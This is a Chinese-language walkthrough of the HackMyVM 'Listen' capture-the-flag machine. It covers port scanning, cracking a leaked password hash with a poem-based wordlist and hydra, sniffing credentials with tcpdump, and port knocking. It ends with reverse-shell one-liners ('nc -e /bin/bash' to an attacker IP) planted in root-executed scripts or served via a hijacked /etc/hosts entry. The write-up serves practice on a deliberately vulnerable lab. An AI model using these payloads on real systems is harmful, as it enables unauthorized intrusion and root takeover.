14.Listen
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Listen
作者:sml
难度:⭐️⭐️⭐️
知识点:流量监听、knock、文件替换、
2. 信息收集
端口扫描
┌──(root㉿kali)-[/home/kali/hmv/listen]
└─# nmap -sS 192.168.9.16 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 22:10 CST
Nmap scan report for 192.168.9.16
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:B0:44:F9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
两个端口都开了防火墙。
这里扫一下udp
┌──(root㉿kali)-[/home/kali/hmv/listen]
└─# nmap -sU 192.168.9.16 -p 1-100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 22:14 CST
Nmap scan report for 192.168.9.16
Host is up (0.0012s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:B0:44:F9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 114.71 seconds
也没有啥东西
Curl一下
┌──(root㉿kali)-[/home/kali/hmv/listen]
└─# curl http://192.168.9.16
<pre>
<h1> Please Listen </h1>
When I ask you to listen to me
and you start giving me advice,
You have not done what I asked.
When I ask you to listen to me
and you begin to tell me why
I shouldnt feel that way,
you are trampling on my feelings.
When I ask you to listen to me
and you feel you have to do something
to solve my problem,
you have failed me,
strange as that may seem.
Listen! All I ask is that you listen.
Dont talk or do, just hear me…
And I can do for myself; I am not helpless.
Maybe discouraged and faltering,
but not helpless.
When you do something for me that I can and need to do for myself,
you contribute to my fear and
Inadequacy.
But when you accept as a simple fact
That I feel what I feel,
No matter how irrational,
Then I can stop trying to convince
You and get about this business
Of understanding whats behind
This irrational feeling.
And when thats clear, the answers are obvious and I dont need advice.
Irrational feelings make sense when
we understand whats behind them.
So please listen, and just hear me.
And if you want to talk, wait a minute
for your turn, and I will listen to you.
-Leo Buscaglia
</pre>
<!--
Leo please, stop using your poems as password!
leo:$6$GyxLtjMYaQWxRxfl$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7:::
-->
这里得到一个用户 和用户的hash
用户 Leo Buscaglia
hash leo:$6$GyxLtjMYaQWxRxfl$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7:::
爆破一下hash
再扫描端口可以发现端口已经开放了
开发了就扫一波目录
啥都没有
rockyou没有爆出来。
解密提示爆破获取密码
Curl返回的内容告诉我们
Leo please, stop using your poems as password!
说明他的密码多半就藏在诗句当中
我们将诗句生成一个字典
text = """
poem
"""
import string
translator = str.maketrans('', '', string.punctuation)
words = text.translate(translator).lower().split()
# 使用集合去重并排序
unique\_words = sorted(set(words))
# 将结果写入 txt 文件
with open("pass\_dic.txt", "w") as file:
for word in unique\_words:
file.write(word + "\n")
利用hydra爆破
获取到密码 contribute
3. 提权
leo@listen:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/leo/poem
leo@listen:~$ ./poem
Ask me:
i
Why
leo@listen:~$
逆向分析一下
传文件
nc -lvp 1234 >poem
nc 192.168.9.3 1234 <poem
这里存在一个缓存区溢出漏洞,但这个是无法利用的。因为编译器对其施加了保护措施
解密listen
靶机名肯定不是乱取的
listen的中文意思就是 听 监听
那我们监听一下这个ip
tcpdump host 192.168.9.16 -A -n
可以获取到一个用户名与密码
以及提示 knock 1337端口 应该就是开放ssh服务端口
silence连进去
silence@listen:~$ cat note.txt
"listen" told me that if I listen, I will hear his password....
silence@listen:~$ ls -al
total 36
drwxr-xr-x 3 silence silence 4096 Oct 16 2020 .
drwxr-xr-x 5 root root 4096 Oct 16 2020 ..
-rw-r--r-- 1 silence silence 220 Oct 16 2020 .bash\_logout
-rw-r--r-- 1 silence silence 3526 Oct 16 2020 .bashrc
-rw-r----- 1 root silence 53 Oct 16 2020 listen.sh
drwxr-xr-x 3 silence silence 4096 Oct 16 2020 .local
-rw-rw---- 1 silence silence 64 Oct 16 2020 note.txt
-rw-r--r-- 1 silence silence 807 Oct 16 2020 .profile
-rw------- 1 silence silence 260 Oct 16 2020 .Xauthority
silence@listen:~$ cat listen.sh
#!/bin/sh
cat /home/listen/password.txt > /dev/pts/4
这条命令会将/home/listen/password.txt 的内容发送到dev/pts/4 这个终端
猜测这个脚本多半会被某个进程执行
用Pspy64检测一下
root用户会执行
silence@listen:~$ ls /dev/pts -la
total 0
drwxr-xr-x 2 root root 0 Nov 8 10:18 .
drwxr-xr-x 17 root root 3180 Nov 8 10:18 ..
crw--w---- 1 silence tty 136, 0 Nov 8 10:50 0
c--------- 1 root root 5, 2 Nov 8 10:18 ptmx
这里目前只有一个终端
我们需要多创建几个终端 使他达到4
这里我们开了5个终端
在第4个终端里面等待他给我们输出密码
获取到listen用户的密码
listen@listen:~$ cat user.txt
HMVimlistening
提权root
这里有两种方法。
替换listen.sh法
listen.sh脚本处于我们silence的用户目录下
且我们是有权限删除他的
替换成我们想要的脚本
echo 'nc -e /bin/bash/192.168.9.3 1234' > listen.sh
然后监听就可以返回root的shell了
修改host法
在listen用户下发现一个脚本
listentome.sh
silence@listen:/home/listen$ cat listentome.sh
wget -O - -q http://listen/ihearyou.sh | bash
他会获取一个ihearyou.sh并执行脚本
利用脚本检测还可以发现 /etc/hosts是可以修改的
我们直接修改这个hosts指向我们的kali
kali开一个服务器,在ihearyou.sh里面写入反弹shell的命令
nc -c /bin/bash 192.168.9.3 1234
HMVthxforlisten